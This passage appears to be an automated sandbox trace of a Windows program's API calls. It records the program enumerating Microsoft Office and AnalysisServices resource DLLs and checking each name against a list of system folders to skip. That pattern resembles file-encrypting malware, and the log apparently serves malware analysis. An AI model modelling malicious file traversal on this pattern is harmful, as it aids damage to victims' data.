lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.397] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf21ea38b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf23b4040, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.397] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.398] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4cfac8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cfac8a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x211030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d698, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.398] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4620012, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4620012, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.398] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.399] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bad1cb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bad1cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.399] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d698, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.399] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff580e7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0063153, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.399] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.400] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.400] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.400] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61fd8b4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4baa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.400] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.401] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6866e01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d770, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.401] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61d7668, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61d7668, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1aaa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.401] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 